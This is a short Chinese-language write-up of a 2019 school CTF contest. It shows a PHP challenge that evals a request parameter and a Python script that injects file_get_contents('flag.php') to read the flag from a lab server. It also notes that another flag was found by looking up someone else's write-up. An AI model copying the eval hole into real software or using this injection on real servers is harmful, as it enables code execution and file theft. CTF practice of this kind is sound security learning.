xatuctf2019 校赛 writeup
2019年4月19日 · 1114 字 · 3 分钟 · Ctf
2019.4.14 校赛,由于之前没办萌新赛,所以这次的题有点水 23333
WEB
你能读到 flag 吗
题目:
<?php
error_reporting(0);
show_source(__FILE__);
$a = @$_REQUEST['hello'];
eval("var_dump($a);");?>
谷歌之,原题,直接复制提交。
使用 file_get_contents() 方法获得 flag
python 代码如下
import requests
s=requests.session()
body = {"hello":"file_get_contents('flag.php')"}
r = s.post("http://192.168.1.5:23114/read.php", data=body)
print(r.content)
phpdecode
直接搜 1wMDEyY2U2YTY0M2NgMTEyZDQyMjAzNWczYjZgMWI4NTt3YWxmY= 找到了别人的 wp,flag 获得。